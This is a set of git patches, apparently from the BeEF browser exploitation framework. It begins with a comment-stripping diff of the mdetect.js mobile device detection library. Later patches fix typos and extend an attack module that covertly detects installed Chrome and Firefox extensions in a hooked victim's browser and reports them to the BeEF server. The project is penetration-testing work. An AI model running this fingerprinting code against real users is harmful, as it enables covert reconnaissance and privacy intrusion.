-//		Update: To address additional Kindle issues...
-//		- Updated DetectRichCSS(): Excluded e-Ink Kindle devices.
-//		- Created DetectAmazonSilk(): Created to detect Kindle Fire devices in Silk mode.
-//		- Updated DetectMobileQuick(): Updated to include e-Ink Kindle devices and the Kindle Fire in Silk mode.
-//
-// File version date: April 11, 2012
-//		Update:
-//		- Added a new variable for the new BlackBerry Curve Touch (9380): deviceBBCurveTouch.
-//		- Updated DetectBlackBerryTouch() to support the new BlackBerry Curve Touch (9380).
-//
-// File version date: January 21, 2012
-//		Update:
-//		- Moved Windows Phone 7 to the iPhone Tier. WP7.5's IE 9-based browser is good enough now.
-//		- Added a new variable for 2 versions of the new BlackBerry Bold Touch (9900 and 9930): deviceBBBoldTouch.
-//		- Updated DetectBlackBerryTouch() to support the 2 versions of the new BlackBerry Bold Touch (9900 and 9930).
-//		- Updated DetectKindle() to focus on eInk devices only. The Kindle Fire should be detected as a regular Android device.
-//
-// File version date: August 22, 2011
-//		Update:
-//		- Updated DetectAndroidTablet() to fix a bug introduced in the last fix! The true/false returns were mixed up.
-//
-// File version date: August 16, 2011
-//		Update:
-//		- Updated DetectAndroidTablet() to exclude Opera Mini, which was falsely reporting as running on a tablet device when on a phone.
-//		- Updated the user agent (uagent) init technique to handle spiders and such with null values.
-//
-//
+// mdetect : http://code.google.com/p/mobileesp/source/browse/JavaScript/mdetect.js r215
 // LICENSE INFORMATION
 // Licensed under the Apache License, Version 2.0 (the "License");
 // you may not use this file except in compliance with the License.
@@ -44,49 +12,16 @@
 // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
 // either express or implied. See the License for the specific
 // language governing permissions and limitations under the License.
-//
-//
-// ABOUT THIS PROJECT
-//   Project Owner: Anthony Hand
-//   Email: anthony.hand@gmail.com
-//   Web Site: http://www.mobileesp.com
-//   Source Files: http://code.google.com/p/mobileesp/
-//
-//   Versions of this code are available for:
-//      PHP, JavaScript, Java, ASP.NET (C#), and Ruby
-//
-//
-// WARNING:
-//   These JavaScript-based device detection features may ONLY work
-//   for the newest generation of smartphones, such as the iPhone,
-//   Android and Palm WebOS devices.
-//   These device detection features may NOT work for older smartphones
-//   which had poor support for JavaScript, including
-//   older BlackBerry, PalmOS, and Windows Mobile devices.
-//   Additionally, because JavaScript support is extremely poor among
-//   'feature phones', these features may not work at all on such devices.
-//   For better results, consider using a server-based version of this code,
-//   such as Java, APS.NET, PHP, or Ruby.
-//
 // *******************************************
 */
 
-//Optional: Store values for quickly accessing same info multiple times.
-//Note: These values are not set automatically.
-//Stores whether the device is an iPhone or iPod Touch.
 var isIphone = false;
-//Stores whether the device is an Android phone or multi-media player.
 var isAndroidPhone = false;
-//Stores whether is the Tablet (HTML5-capable, larger screen) tier of devices.
 var isTierTablet = false;
-//Stores whether is the iPhone tier of devices.
 var isTierIphone = false;
-//Stores whether the device can probably support Rich CSS, but JavaScript support is not assumed. (e.g., newer BlackBerry, Windows Mobile)
 var isTierRichCss = false;
-//Stores whether it is another mobile device, which cannot be assumed to support CSS or JS (eg, older BlackBerry, RAZR)
 var isTierGenericMobile = false;
 
-//Initialize some initial string variables we'll look for later.
 var engineWebKit = "webkit";
 var deviceIphone = "iphone";
 var deviceIpod = "ipod";
@@ -134,12 +69,9 @@ var engineXiino = "xiino";
 var deviceKindle = "kindle"; //Amazon Kindle, eInk one
 var engineSilk = "silk"; //Amazon's accelerated Silk browser for Kindle Fire
 
-//Initialize variables for mobile-specific content.
 var vndwap = "vnd.wap";
 var wml = "wml";
 
-//Initialize variables for random devices and mobile browsers.
-//Some of these may not support JavaScript
 var deviceTablet = "tablet"; //Generic term for slate and tablet devices
 var deviceBrew = "brew";
 var deviceDanger = "danger";
@@ -164,45 +96,33 @@ var mini = "mini";  //Some mobile browsers put 'mini' in their names.
 var mobile = "mobile"; //Some mobile browsers put 'mobile' in their user agent strings.
 var mobi = "mobi"; //Some mobile browsers put 'mobi' in their user agent strings.
 
-//Use Maemo, Tablet, and Linux to test for Nokia's Internet Tablets.
 var maemo = "maemo";
 var linux = "linux";
 var qtembedded = "qt embedded"; //for Sony Mylo and others
 var mylocom2 = "com2"; //for Sony Mylo also
 
-//In some UserAgents, the only clue is the manufacturer.
 var manuSonyEricsson = "sonyericsson";
 var manuericsson = "ericsson";
 var manuSamsung1 = "sec-sgh";
 var manuSony = "sony";
 var manuHtc = "htc"; //Popular Android and WinMo manufacturer
 
-//In some UserAgents, the only clue is the operator.
 var svcDocomo = "docomo";
 var svcKddi = "kddi";
 var svcVodafone = "vodafone";
 
-//Disambiguation strings.
 var disUpdate = "update"; //pda vs. update
 
-
-
-//Initialize our user agent string.
 var uagent = "";
 if (navigator && navigator.userAgent)
     uagent = navigator.userAgent.toLowerCase();
 
-
-//**************************
-// Detects if the current device is an iPhone.
 function DetectIphone()
 {
    if (uagent.search(deviceIphone) > -1)
    {
-      //The iPad and iPod Touch say they're an iPhone! So let's disambiguate.
       if (DetectIpad() || DetectIpod())
          return false;
-      //Yay! It's an iPhone!
       else
          return true;
    }
@@ -210,8 +130,6 @@ function DetectIphone()
       return false;
 }
 
-//**************************
-// Detects if the current device is an iPod Touch.
 function DetectIpod()
 {
    if (uagent.search(deviceIpod) > -1)
@@ -220,8 +138,6 @@ function DetectIpod()
       return false;
 }
 
-//**************************
-// Detects if the current device is an iPad tablet.
 function DetectIpad()
 {
    if (uagent.search(deviceIpad) > -1  && DetectWebkit())
@@ -230,12 +146,8 @@ function DetectIpad()
       return false;
 }
 
-//**************************
-// Detects if the current device is an iPhone or iPod Touch.
 function DetectIphoneOrIpod()
 {
-   //We repeat the searches here because some iPods
-   //  may report themselves as an iPhone, which is ok.
    if (uagent.search(deviceIphone) > -1 ||
        uagent.search(deviceIpod) > -1)
        return true;
@@ -243,8 +155,6 @@ function DetectIphoneOrIpod()
        return false;
 }
 
-//**************************
-// Detects *any* iOS device: iPhone, iPod Touch, iPad.
 function DetectIos()
 {
    if (DetectIphoneOrIpod() || DetectIpad())
@@ -253,56 +163,38 @@ function DetectIos()
       return false;
 }
 
-//**************************
-// Detects *any* Android OS-based device: phone, tablet, and multi-media player.
-// Also detects Google TV.
 function DetectAndroid()
 {
    if ((uagent.search(deviceAndroid) > -1) || DetectGoogleTV())
       return true;
-   //Special check for the HTC Flyer 7" tablet. It should report here.
    if (uagent.search(deviceHtcFlyer) > -1)
       return true;
    else
       return false;
 }
 
-//**************************
-// Detects if the current device is a (small-ish) Android OS-based device
-// used for calling and/or multi-media (like a Samsung Galaxy Player).
-// Google says these devices will have 'Android' AND 'mobile' in user agent.
-// Ignores tablets (Honeycomb and later).
 function DetectAndroidPhone()
 {
    if (DetectAndroid() && (uagent.search(mobile) > -1))
       return true;
-   //Special check for Android phones with Opera Mobile. They should report here.
    if (DetectOperaAndroidPhone())
       return true;
-   //Special check for the HTC Flyer 7" tablet. It should report here.
    if (uagent.search(deviceHtcFlyer) > -1)
       return true;
    else
       return false;
 }
 
-//**************************
-// Detects if the current device is a (self-reported) Android tablet.
-// Google says these devices will have 'Android' and NOT 'mobile' in their user agent.
 function DetectAndroidTablet()
 {
-   //First, let's make sure we're on an Android device.
    if (!DetectAndroid())
       return false;
 
-   //Special check for Opera Android Phones. They should NOT report here.
    if (DetectOperaMobile())
       return false;
-   //Special check for the HTC Flyer 7" tablet. It should NOT report here.
    if (uagent.search(deviceHtcFlyer) > -1)
       return false;
 
-   //Otherwise, if it's Android and does NOT have 'mobile' in it, Google says it's a tablet.
    if (uagent.search(mobile) > -1)
       return false;
    else
@@ -310,9 +202,6 @@ function DetectAndroidTablet()
 }
 
 
-//**************************
-// Detects if the current device is an Android OS-based device and
-//   the browser is based on WebKit.
 function DetectAndroidWebKit()
 {
    if (DetectAndroid() && DetectWebkit())
@@ -322,8 +211,6 @@ function DetectAndroidWebKit()
 }
 
 
-//**************************
-// Detects if the current device is a GoogleTV.
 function DetectGoogleTV()
 {
    if (uagent.search(deviceGoogleTV) > -1)
@@ -333,8 +220,6 @@ function DetectGoogleTV()
 }
 
 
-//**************************
-// Detects if the current browser is based on WebKit.
 function DetectWebkit()
 {
    if (uagent.search(engineWebKit) > -1)
@@ -343,8 +228,6 @@ function DetectWebkit()
       return false;
 }
 
-//**************************
-// Detects if the current browser is the Nokia S60 Open Source Browser.
 function DetectS60OssBrowser()
 {
    if (DetectWebkit())
@@ -359,10 +242,6 @@ function DetectS60OssBrowser()
       return false;
 }
 
-//**************************
-// Detects if the current device is any Symbian OS-based device,
-//   including older S60, Series 70, Series 80, Series 90, and UIQ,
-//   or other browsers running on these devices.
 function DetectSymbianOS()
 {
    if (uagent.search(deviceSymbian) > -1 ||
@@ -375,9 +254,6 @@ function DetectSymbianOS()
       return false;
 }
 
-//**************************
-// Detects if the current browser is a
-// Windows Phone 7 device.
 function DetectWindowsPhone7()
 {
    if (uagent.search(deviceWinPhone7) > -1)
@@ -386,26 +262,17 @@ function DetectWindowsPhone7()
       return false;
 }
 
-//**************************
-// Detects if the current browser is a Windows Mobile device.
-// Excludes Windows Phone 7 devices.
-// Focuses on Windows Mobile 6.xx and earlier.
 function DetectWindowsMobile()
 {
-   //Exclude new Windows Phone 7.
    if (DetectWindowsPhone7())
       return false;
-   //Most devices use 'Windows CE', but some report 'iemobile'
-   //  and some older ones report as 'PIE' for Pocket IE.
    if (uagent.search(deviceWinMob) > -1 ||
        uagent.search(deviceIeMob) > -1 ||
        uagent.search(enginePie) > -1)
       return true;
-   //Test for Windows Mobile PPC but not old Macintosh PowerPC.
    if ((uagent.search(devicePpc) > -1) &&
        !(uagent.search(deviceMacPpc) > -1))
       return true;
-   //Test for Windwos Mobile-based HTC devices.
    if (uagent.search(manuHtc) > -1 &&
        uagent.search(deviceWindows) > -1)
       return true;
@@ -413,9 +280,6 @@ function DetectWindowsMobile()
       return false;
 }
 
-//**************************
-// Detects if the current browser is a BlackBerry of some sort.
-// Includes the PlayBook.
 function DetectBlackBerry()
 {
    if (uagent.search(deviceBB) > -1)
@@ -426,9 +290,6 @@ function DetectBlackBerry()
       return false;
 }
 
-//**************************
-// Detects if the current browser is on a BlackBerry tablet device.
-//    Example: PlayBook
 function DetectBlackBerryTablet()
 {
    if (uagent.search(deviceBBPlaybook) > -1)
@@ -437,10 +298,6 @@ function DetectBlackBerryTablet()
       return false;
 }
 
-//**************************
-// Detects if the current browser is a BlackBerry device AND uses a
-//    WebKit-based browser. These are signatures for the new BlackBerry OS 6.
-//    Examples: Torch. Includes the Playbook.
 function DetectBlackBerryWebKit()
 {
    if (DetectBlackBerry() &&
@@ -450,9 +307,6 @@ function DetectBlackBerryWebKit()
       return false;
 }
 
-//**************************
-// Detects if the current browser is a BlackBerry Touch
-//    device, such as the Storm, Torch, and Bold Touch. Excludes the Playbook.
 function DetectBlackBerryTouch()
 {
    if (DetectBlackBerry() &&
@@ -465,14 +319,8 @@ function DetectBlackBerryTouch()
       return false;
 }
 
-//**************************
-// Detects if the current browser is a BlackBerry OS 5 device AND
-//    has a more capable recent browser. Excludes the Playbook.
-//    Examples, Storm, Bold, Tour, Curve2
-//    Excludes the new BlackBerry OS 6 and 7 browser!!
 function DetectBlackBerryHigh()
 {
-   //Disambiguate for BlackBerry OS 6 or 7 (WebKit) browser
    if (DetectBlackBerryWebKit())
       return false;
    if (DetectBlackBerry())
@@ -489,15 +337,10 @@ function DetectBlackBerryHigh()
       return false;
 }
 
-//**************************
-// Detects if the current browser is a BlackBerry device AND
-//    has an older, less capable browser.
-//    Examples: Pearl, 8800, Curve1.
 function DetectBlackBerryLow()
 {
    if (DetectBlackBerry())
    {
-     //Assume that if it's not in the High tier or has WebKit, then it's Low.
      if (DetectBlackBerryHigh() || DetectBlackBerryWebKit())
         return false;
      else
@@ -508,17 +351,12 @@ function DetectBlackBerryLow()
 }
 
 
-//**************************
-// Detects if the current browser is on a PalmOS device.
 function DetectPalmOS()
 {
-   //Most devices nowadays report as 'Palm',
-   //  but some older ones reported as Blazer or Xiino.
    if (uagent.search(devicePalm) > -1 ||
        uagent.search(engineBlazer) > -1 ||
        uagent.search(engineXiino) > -1)
    {
-     //Make sure it's not WebOS first
      if (DetectPalmWebOS())
         return false;
      else
@@ -528,9 +366,6 @@ function DetectPalmOS()
       return false;
 }
 
-//**************************
-// Detects if the current browser is on a Palm device
-//   running the new WebOS.
 function DetectPalmWebOS()
 {
    if (uagent.search(deviceWebOS) > -1)
@@ -539,8 +374,6 @@ function DetectPalmWebOS()
       return false;
 }
 
-//**************************
-// Detects if the current browser is on an HP tablet running WebOS.
 function DetectWebOSTablet()
 {
    if (uagent.search(deviceWebOShp) > -1 &&
@@ -550,9 +383,6 @@ function DetectWebOSTablet()
       return false;
 }
 
-//**************************
-// Detects if the current browser is a
-//   Garmin Nuvifone.
 function DetectGarminNuvifone()
 {
    if (uagent.search(deviceNuvifone) > -1)
@@ -562,10 +392,6 @@ function DetectGarminNuvifone()
 }
 
 
-//**************************
-// Check to see whether the device is a 'smartphone'.
-//   You might wish to send smartphones to a more capable web page
-//   than a dumbed down WAP page.
 function DetectSmartphone()
 {
    if (DetectIphoneOrIpod()
@@ -580,12 +406,9 @@ function DetectSmartphone()
       || DetectGarminNuvifone())
       return true;
 
-   //Otherwise, return false.
    return false;
 };
 
-//**************************
-// Detects if the current device is an Archos media player/Internet tablet.
 function DetectArchos()
 {
    if (uagent.search(deviceArchos) > -1)
@@ -594,8 +417,6 @@ function DetectArchos()
       return false;
 }
 
-//**************************
-// Detects whether the device is a Brew-powered device.
 function DetectBrewDevice()
 {
    if (uagent.search(deviceBrew) > -1)
@@ -604,8 +425,6 @@ function DetectBrewDevice()
       return false;
 }
 
-//**************************
-// Detects the Danger Hiptop device.
 function DetectDangerHiptop()
 {
    if (uagent.search(deviceDanger) > -1 ||
@@ -615,14 +434,10 @@ function DetectDangerHiptop()
       return false;
 }
 
-//**************************
-// Detects if the current device is on one of
-// the Maemo-based Nokia Internet Tablets.
 function DetectMaemoTablet()
 {
    if (uagent.search(maemo) > -1)
       return true;
-   //For Nokia N810, must be Linux + Tablet, or else it could be something else.
    if ((uagent.search(linux) > -1)
        && (uagent.search(deviceTablet) > -1)
        && !DetectWebOSTablet()
@@ -632,8 +447,6 @@ function DetectMaemoTablet()
       return false;
 }
 
-//**************************
-// Detects if the current browser is a Sony Mylo device.
 function DetectSonyMylo()
 {
    if (uagent.search(manuSony) > -1)
@@ -648,8 +461,6 @@ function DetectSonyMylo()
       return false;
 }
 
-//**************************
-// Detects if the current browser is Opera Mobile or Mini.
 function DetectOperaMobile()
 {
    if (uagent.search(engineOpera) > -1)
@@ -664,9 +475,6 @@ function DetectOperaMobile()
       return false;
 }
 
-//**************************
-// Detects if the current browser is Opera Mobile
-// running on an Android phone.
 function DetectOperaAndroidPhone()
 {
    if ((uagent.search(engineOpera) > -1) &&
@@ -677,9 +485,6 @@ function DetectOperaAndroidPhone()
       return false;
 }
 
-//**************************
-// Detects if the current browser is Opera Mobile
-// running on an Android tablet.
 function DetectOperaAndroidTablet()
 {
    if ((uagent.search(engineOpera) > -1) &&
@@ -690,8 +495,6 @@ function DetectOperaAndroidTablet()
       return false;
 }
 
-//**************************
-// Detects if the current device is a Sony Playstation.
 function DetectSonyPlaystation()
 {
    if (uagent.search(devicePlaystation) > -1)
@@ -700,8 +503,6 @@ function DetectSonyPlaystation()
       return false;
 };
 
-//**************************
-// Detects if the current device is a Nintendo game device.
 function DetectNintendo()
 {
    if (uagent.search(deviceNintendo) > -1   ||
@@ -712,8 +513,6 @@ function DetectNintendo()
       return false;
 };
 
-//**************************
-// Detects if the current device is a Microsoft Xbox.
 function DetectXbox()
 {
    if (uagent.search(deviceXbox) > -1)
@@ -722,8 +521,6 @@ function DetectXbox()
       return false;
 };
 
-//**************************
-// Detects if the current device is an Internet-capable game console.
 function DetectGameConsole()
 {
    if (DetectSonyPlaystation())
@@ -736,9 +533,6 @@ function DetectGameConsole()
       return false;
 };
 
-//**************************
-// Detects if the current device is an Amazon Kindle (eInk devices only).
-// Note: For the Kindle Fire, use the normal Android methods.
 function DetectKindle()
 {
    if (uagent.search(deviceKindle) > -1 &&
@@ -748,9 +542,6 @@ function DetectKindle()
       return false;
 }
 
-//**************************
-// Detects if the current Amazon device is using the Silk Browser.
-// Note: Typically used by the the Kindle Fire.
 function DetectAmazonSilk()
 {
    if (uagent.search(engineSilk) > -1)
@@ -759,17 +550,11 @@ function DetectAmazonSilk()
       return false;
 }
 
-//**************************
-// Detects if the current device is a mobile device.
-//  This method catches most of the popular modern devices.
-//  Excludes Apple iPads and other modern tablets.
 function DetectMobileQuick()
 {
-   //Let's exclude tablets.
    if (DetectTierTablet())
       return false;
 
-   //Most mobile browsing is done on smartphones
    if (DetectSmartphone())
       return true;
 
@@ -809,8 +594,6 @@ function DetectMobileQuick()
 };
 
 
-//**************************
-// Detects in a more comprehensive way if the current device is a mobile device.
 function DetectMobileLong()
 {
    if (DetectMobileQuick())
@@ -820,7 +603,6 @@ function DetectMobileLong()
    if (DetectSonyMylo())
       return true;
 
-   //Detect for certain very old devices with stupid useragent strings.
    if (uagent.search(manuSamsung1) > -1 ||
 	uagent.search(manuSonyEricsson) > -1 ||
 	uagent.search(manuericsson) > -1)
@@ -838,15 +620,6 @@ function DetectMobileLong()
 };
 
 
-//*****************************
-// For Mobile Web Site Design
-//*****************************
-
-//**************************
-// The quick way to detect for a tier of devices.
-//   This method detects for the new generation of
-//   HTML 5 capable, larger screen tablets.
-//   Includes iPad, Android (e.g., Xoom), BB Playbook, WebOS, etc.
 function DetectTierTablet()
 {
    if (DetectIpad()
@@ -858,11 +631,6 @@ function DetectTierTablet()
       return false;
 };
 
-//**************************
-// The quick way to detect for a tier of devices.
-//   This method detects for devices which can
-//   display iPhone-optimized web content.
-//   Includes iPhone, iPod Touch, Android, Windows Phone 7, WebOS, etc.
 function DetectTierIphone()
 {
    if (DetectIphoneOrIpod())
@@ -881,31 +649,21 @@ function DetectTierIphone()
       return false;
 };
 
-//**************************
-// The quick way to detect for a tier of devices.
-//   This method detects for devices which are likely to be
-//   capable of viewing CSS content optimized for the iPhone,
-//   but may not necessarily support JavaScript.
-//   Excludes all iPhone Tier devices.
 function DetectTierRichCss()
 {
     if (DetectMobileQuick())
     {
-       //Exclude iPhone Tier and e-Ink Kindle devices
        if (DetectTierIphone() || DetectKindle())
           return false;
 
-       //The following devices are explicitly ok.
        if (DetectWebkit())
           return true;
        if (DetectS60OssBrowser())
           return true;
 
-       //Note: 'High' BlackBerry devices ONLY
        if (DetectBlackBerryHigh())
           return true;
 
-       //Older Windows 'Mobile' isn't good enough for iPhone Tier.
        if (DetectWindowsMobile())
           return true;
 
@@ -919,21 +677,13 @@ function DetectTierRichCss()
       return false;
 };
 
-//**************************
-// The quick way to detect for a tier of devices.
-//   This method detects for all other types of phones,
-//   but excludes the iPhone and RichCSS Tier devices.
-// NOTE: This method probably won't work due to poor
-//  support for JavaScript among other devices.
 function DetectTierOtherPhones()
 {
     if (DetectMobileLong())
     {
-       //Exclude devices in the other 2 categories
        if (DetectTierIphone() || DetectTierRichCss())
           return false;
 
-       //Otherwise, it's a YES
        else
           return true;
     }
@@ -942,20 +692,15 @@ function DetectTierOtherPhones()
 };
 
 
-//**************************
-// Initialize Key Stored Values.
 function InitDeviceScan()
 {
-    //We'll use these 4 variables to speed other processing. They're super common.
     isIphone = DetectIphoneOrIpod();
     isAndroidPhone = DetectAndroidPhone();
     isTierIphone = DetectTierIphone();
     isTierTablet = DetectTierTablet();
 
-    //Optional: Comment these out if you don't need them.
     isTierRichCss = DetectTierRichCss();
     isTierGenericMobile = DetectTierOtherPhones();
 };
 
-//Now, run the initialization method.
 InitDeviceScan()

From bd2b0023141547fc1c529a1f51628917950898c0 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 7 Jan 2013 05:17:55 +1030
Subject: [PATCH 143/397] Fix a few typos

---
 extensions/evasion/config.yaml                         | 2 +-
 modules/browser/avant_steal_history/module.rb          | 2 +-
 modules/phonegap/phonegap_check_connection/config.yaml | 4 ++--
 3 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/extensions/evasion/config.yaml b/extensions/evasion/config.yaml
index 06a1b803d..8ba097941 100644
--- a/extensions/evasion/config.yaml
+++ b/extensions/evasion/config.yaml
@@ -9,7 +9,7 @@ beef:
             enable: true
             name: 'Evasion'
             authors: ["antisnatchor"]
-            exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js","lib/mdetect.js"]
+            exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js", "lib/mdetect.js"]
             scramble_variables: true
             scramble_cookies: true
             scramble:
diff --git a/modules/browser/avant_steal_history/module.rb b/modules/browser/avant_steal_history/module.rb
index 7a819fa5e..1d0692b76 100644
--- a/modules/browser/avant_steal_history/module.rb
+++ b/modules/browser/avant_steal_history/module.rb
@@ -21,7 +21,7 @@ class Avant_steal_history < BeEF::Core::Command
 		
 
 		return [
-			{'name' => 'cId', 'ui_label' => 'Command ID:', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
+			{'name' => 'cId', 'ui_label' => 'Command ID', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
 		]
 
 	end
diff --git a/modules/phonegap/phonegap_check_connection/config.yaml b/modules/phonegap/phonegap_check_connection/config.yaml
index d7f286e08..ab6256e52 100644
--- a/modules/phonegap/phonegap_check_connection/config.yaml
+++ b/modules/phonegap/phonegap_check_connection/config.yaml
@@ -10,8 +10,8 @@ beef:
         phonegap_check_connection:
             enable: true
             category: "Phonegap"
-            name: "Check connection"
-            description: "Find out connection type e.g. Wifi, 3G.."
+            name: "Check Connection"
+            description: "Find out the network connection type e.g. Wifi, 3G."
             authors: ["mh"]
             target:
                 working: ["All"]

From 87afb9a31bf66ab7f0de2e4fa11d2c33649ada4a Mon Sep 17 00:00:00 2001
From: Nbblrr <Nbblrr>
Date: Sun, 6 Jan 2013 22:39:43 +0100
Subject: [PATCH 144/397] Improved extension detection with the old Firefox
 hack #815

---
 .../detect_extensions}/command.js             | 86 +++++++++++++++++--
 modules/browser/detect_extensions/config.yaml | 22 +++++
 .../detect_extensions}/module.rb              |  5 +-
 .../get_chrome_extensions/config.yaml         | 16 ----
 4 files changed, 104 insertions(+), 25 deletions(-)
 rename modules/{chrome_extensions/get_chrome_extensions => browser/detect_extensions}/command.js (93%)
 create mode 100644 modules/browser/detect_extensions/config.yaml
 rename modules/{chrome_extensions/get_chrome_extensions => browser/detect_extensions}/module.rb (74%)
 delete mode 100644 modules/chrome_extensions/get_chrome_extensions/config.yaml

diff --git a/modules/chrome_extensions/get_chrome_extensions/command.js b/modules/browser/detect_extensions/command.js
similarity index 93%
rename from modules/chrome_extensions/get_chrome_extensions/command.js
rename to modules/browser/detect_extensions/command.js
index 59f814324..660530ab3 100644
--- a/modules/chrome_extensions/get_chrome_extensions/command.js
+++ b/modules/browser/detect_extensions/command.js
@@ -6,7 +6,7 @@
 
 beef.execute(function() {
 
-	extensions = new Array(
+	chrome_extensions = new Array(
 		new Array("blpcfgokakmgnkcojhhkbfbldkacnbeo","YouTube"),
 		new Array("pjkljhegncpnkpknbcohdijeoejaedia","Gmail"),
 		new Array("coobgpohoikkiipiblmjeljniedjpjpf","Google Search"),
@@ -1009,7 +1009,61 @@ beef.execute(function() {
 		new Array("inolmjbojghkehmmlbdmpdlmagalddni","Jagran - India No.1 Hindi News Daily")
 	);
 
-	var detect = function(addon_id, addon_name) {
+        var firefox_extensions = {
+                "Adblock Plus" : "chrome://adblockplus/skin/adblockplus.png",
+                "Auto Copy" : "chrome://autocopy/skin/autocopy.png",
+                "ColorZilla" : "chrome://colorzilla/skin/logo.png",
+                "Customize Google" : "chrome://customizegoogle/skin/32x32.png",
+                "DownThemAll!" : "chrome://dta/content/immagini/icon.png",
+                "Faster Fox" : "chrome://fasterfox/skin/icon.png",
+                "Flash Block" : "chrome://flashblock/skin/flash-on-24.png",
+                "FlashGot" : "chrome://flashgot/skin/icon32.png",
+                "Forecastfox" : "chrome://forecastfox/skin/images/icon.png",
+                "Google Toolbar" : "chrome://google-toolbar/skin/icon.png",
+                "Greasemonkey" : "chrome://greasemonkey/content/status_on.gif",
+                "IE Tab" : "chrome://ietab/skin/ietab-button-ie16.png",
+                "IE View" : "chrome://ieview/skin/ieview-icon.png",
+                "JS View" : "chrome://jsview/skin/jsview.gif",
+                "Live HTTP Headers" : "chrome://livehttpheaders/skin/img/Logo.png",
+                "MeasureIt" : "chrome://measureit/skin/measureit.png",
+                "SEO For Firefox" : "chrome://seo4firefox/content/icon32.png",
+                "SEOpen" : "chrome://seopen/skin/seopen.png",
+                "Search Status" : "chrome://searchstatus/skin/cax10.png",
+                "Server Switcher" : "chrome://switcher/skin/icon.png",
+                "StumbleUpon" : "chrome://stumbleupon/content/skin/logo32.png",
+                "Tab Mix Plus" : "chrome://tabmixplus/skin/tmp.png",
+                "Torrent-Search Toolbar" : "chrome://torrent-search/skin/v.png",
+                "User Agent Switcher" : "chrome://useragentswitcher/content/logo.png",
+                "View Source With" : "chrome://viewsourcewith/skin/ff/tb16.png",
+                "Web Developer" : "chrome://webdeveloper/content/images/logo.png",
+                "Unhide Passwords" : "chrome://unhidepw/skin/unhidepw.png",
+                "UrlParams" : "chrome://urlparams/skin/urlparams32.png",
+                "NewsFox" : "chrome://newsfox/skin/images/home.png",
+                "Add N Edit Cookies" : "chrome://addneditcookies/skin/images/anec32.png",
+                "GTDGmail" : "chrome://gtdgmail/content/gtd_lineitem.png",
+                "QuickJava" : "chrome://quickjava/content/js.png",
+                "Adblock Filterset.G Updater" : "chrome://unplug/skin/unplug.png",
+                "BBCode" : "chrome://bbcode/skin/bbcode.png",
+                "BugMeNot" : "chrome://bugmenot/skin/bugmenot.png",
+                "ConQuery" : "chrome://conquery/skin/conquery.png",
+                "Download Manager Tweak" : "chrome://downloadmgr/skin/downloadIcon.png",
+                "Extended Cookie Manager" : "chrome://xcm/content/allowed.png",
+                "FireBug" : "chrome://firebug/content/firebug32.png",
+                "FoxyTunes" : "chrome://foxytunes/skin/logo.png",
+                "MR Tech Disable XPI Install Delay" : "chrome://disable_xpi_delay/content/icon.png",
+                "SessionSaver .2" : "chrome://sessionsaver/content/ss.png",
+                "spooFX" : "chrome://spoofx/skin/main/spoofx.png",
+                "Statusbar Clock" : "chrome://timestatus/skin/icon.png",
+                "Torbutton" : "chrome://torbutton/skin/bigbutton_gr.png",
+                "UnPlug" : "chrome://unplug/skin/unplug.png",
+                "View Source Chart" : "chrome://vrs/skin/vrssmall.png",
+                "XPather" : "chrome://xpather/content/iconka.png",
+                "WOT" : "chrome://wot/skin/fusion/logo.png",
+                "LastPass" : "chrome://lastpass/skin/vaultdelete.png",
+
+        };
+
+	var detect_chrome_extension = function(addon_id, addon_name) {
 		var s = document.createElement('script');
 		s.onload = function() {
 			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension='+addon_name);
@@ -1018,11 +1072,29 @@ beef.execute(function() {
 		document.body.appendChild(s);
 	}
 
-	try {
-		for (var i=0; i<extensions.length; i++) {
-			detect(extensions[i][0], extensions[i][1]);
-		}
-	} catch(e) {}
+        var detect_firefox_extension = function(addon_url, addon_name) {
+                var img = document.createElement("img");
+                img.setAttribute("border", '0');
+                img.setAttribute("width", '0');
+                img.setAttribute("height", '0');
+                img.setAttribute("onload", "beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension=" + addon_name+ "');");
+                img.setAttribute("src", addon_url);
+        }
+
+        if(beef.browser.isC()) {
+                try {
+                        for (var i=0; i<chrome_extensions.length; i++) {
+                                detect_chrome_extension(chrome_extensions[i][0], chrome_extensions[i][1]);
+                        }
+                } catch(e) {}
+        } else if(beef.browser.isFF()) {
+                try {
+                        for (var i in firefox_extensions) {
+                                detect_firefox_extension(firefox_extensions[i], i);
+                        }
+                } catch(e) {}
+        } else {
+        };
 
 });
 
diff --git a/modules/browser/detect_extensions/config.yaml b/modules/browser/detect_extensions/config.yaml
new file mode 100644
index 000000000..af923f60b
--- /dev/null
+++ b/modules/browser/detect_extensions/config.yaml
@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_extensions:
+            enable: true
+            category: "Browser"
+            name: "Detect Chrome/Firefox Extensions"
+            description: "This module detects Extensions in Chrome and Firefox "
+            authors: ["koto", "bcoles", "nbblrr"]
+            target:
+                working:
+                    FF:
+                        min_ver: 1
+                        max_ver: latest
+                    C:
+                        min_ver: 1
+                        max_ver: 18
+                not_working: ["All"]
diff --git a/modules/chrome_extensions/get_chrome_extensions/module.rb b/modules/browser/detect_extensions/module.rb
similarity index 74%
rename from modules/chrome_extensions/get_chrome_extensions/module.rb
rename to modules/browser/detect_extensions/module.rb
index 087646604..2e8b4bf0f 100644
--- a/modules/chrome_extensions/get_chrome_extensions/module.rb
+++ b/modules/browser/detect_extensions/module.rb
@@ -5,14 +5,15 @@
 #
 # More info:
 #	http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
+#	http://jeremiahgrossman.blogspot.fr/2006/08/i-know-what-youve-got-firefox.html
 #
-class Detect_chrome_extensions < BeEF::Core::Command
+class Detect_extensions < BeEF::Core::Command
 
   def post_execute
     content = {}
     content['extension'] = @datastore['extension']
     save content
   end
-  
+
 end
 
diff --git a/modules/chrome_extensions/get_chrome_extensions/config.yaml b/modules/chrome_extensions/get_chrome_extensions/config.yaml
deleted file mode 100644
index d5519b296..000000000
